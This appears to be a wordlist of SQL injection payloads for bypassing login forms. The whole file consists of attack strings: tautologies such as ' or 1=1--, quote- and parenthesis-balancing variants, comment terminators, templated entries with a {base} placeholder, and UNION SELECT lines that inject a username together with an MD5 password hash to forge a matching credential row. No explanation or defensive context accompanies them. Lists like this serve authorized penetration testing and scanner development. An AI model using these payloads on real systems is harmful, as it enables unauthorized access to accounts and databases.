'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1-- 
or 1=1#
or 1=1/*
{base}' --
{base}' #
{base}'/*
{base}' or '1'='1
{base}' or '1'='1'--
{base}' or '1'='1'#
{base}' or '1'='1'/*
{base}'or 1=1 or ''='
{base}' or 1=1
{base}' or 1=1--
{base}' or 1=1#
{base}' or 1=1/*
{base}') or ('1'='1
{base}') or ('1'='1'--
{base}') or ('1'='1'#
{base}') or ('1'='1'/*
{base}') or '1'='1
{base}') or '1'='1'--
{base}') or '1'='1'#
{base}') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT '{base}', '81dc9bdb52d04dc20036dbd8313ed055
{base}" --
{base}" #
{base}"/*
{base}" or "1"="1
{base}" or "1"="1"--
{base}" or "1"="1"#
{base}" or "1"="1"/*
{base}"or 1=1 or ""="
{base}" or 1=1
{base}" or 1=1--
{base}" or 1=1#
{base}" or 1=1/*
{base}") or ("1"="1
{base}") or ("1"="1"--
{base}") or ("1"="1"#
{base}") or ("1"="1"/*
{base}") or "1"="1
{base}") or "1"="1"--
{base}") or "1"="1"#
{base}") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "{base}", "81dc9bdb52d04dc20036dbd8313ed055
